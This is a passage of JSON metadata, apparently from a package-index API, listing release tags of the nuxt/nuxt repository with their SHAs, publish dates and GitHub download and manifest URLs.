/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.3/manifests"},{"name":"@nuxt/ui@0.3.2","sha":"1115aac4272174a3e9f106581a1051cce5c1731e","kind":"tag","published_at":"2022-09-05T13:39:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.2/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"@nuxt/ui-templates@0.3.2","sha":"dafb9ed0e436601b44a7dc8e6caa459314193ec7","kind":"tag","published_at":"2022-08-12T21:23:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.2/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"@nuxt/ui-templates@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.1/manifests"},{"name":"@nuxt/ui@0.3.1","sha":"4a9060d9cc44e23bc833dfb7ab652fc687fba390","kind":"tag","published_at":"2022-08-11T21:17:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.1/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"@nuxt/ui-templates@0.3.0","sha":"3623350feeb4b0ba4906611071430c7577440a75","kind":"tag","published_at":"2022-07-21T12:41:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.3.0/manifests"},{"name":"@nuxt/ui-templates@0.2.2","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.2/manifests"},{"name":"@nuxt/ui@0.3.0","sha":"b6969f5639cb3f4cb343de99b815526cac04f99b","kind":"tag","published_at":"2022-07-21T12:36:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.3.0/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"@nuxt/ui-templates@0.2.1","sha":"1e0e83e29ac3633e299b9261c64122b360216200","kind":"tag","published_at":"2022-07-12T14:12:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.1/manifests"},{"name":"@nuxt/ui-templates@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.2.0/manifests"},{"name":"@nuxt/ui@0.2.0","sha":"54dc4c8502804409a8248409cde027cf77ddc39c","kind":"tag","published_at":"2022-07-12T13:57:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.2.0/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"@nuxt/ui-templates@0.1.1","sha":"2ea0ad23512a0ce341092dd08162503d94b8eef9","kind":"tag","published_at":"2022-05-07T18:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.1/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"@nuxt/ui@0.1.1","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-05-02T09:31:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.1/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"@nuxt/ui-templates@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@0.1.0/manifests"},{"name":"@nuxt/ui-assets@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.1.0/manifests"},{"name":"@nuxt/ui@0.1.0","sha":"434afa4351240467b5fd99a913adc4970ff99584","kind":"tag","published_at":"2022-04-19T07:55:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui@0.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui@0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui%400.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui@0.1.0/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d